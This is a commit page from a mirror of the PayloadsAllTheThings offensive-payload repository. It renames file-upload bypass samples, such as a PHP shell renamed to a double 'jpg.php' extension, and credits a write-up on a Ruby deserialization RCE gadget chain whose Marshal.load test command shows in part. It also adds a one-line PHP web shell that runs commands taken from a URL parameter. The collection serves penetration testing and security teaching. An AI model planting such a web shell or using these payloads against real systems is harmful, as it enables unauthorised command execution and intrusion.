mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Files JPEG -> JPG + Tag v2
This commit is contained in:
parent
af9abc6592
commit
3522d9a674
@ -8,4 +8,5 @@ for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1
|
||||
|
||||
## Thanks
|
||||
|
||||
- [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/)
|
||||
- [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/)
|
||||
- [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online)
|
0
Upload insecure files/PHP Extension/Shell.php3 → Upload insecure files/PHP Extension/shell.jpg.php
Executable file → Normal file
0
Upload insecure files/PHP Extension/Shell.php3 → Upload insecure files/PHP Extension/shell.jpg.php
Executable file → Normal file
1
Upload insecure files/PHP Extension/shell.shtml
Executable file
1
Upload insecure files/PHP Extension/shell.shtml
Executable file
@ -0,0 +1 @@
|
||||
<?php echo "Shell";system($_GET['cmd']); ?>
|
Loading…
Reference in New Issue
Block a user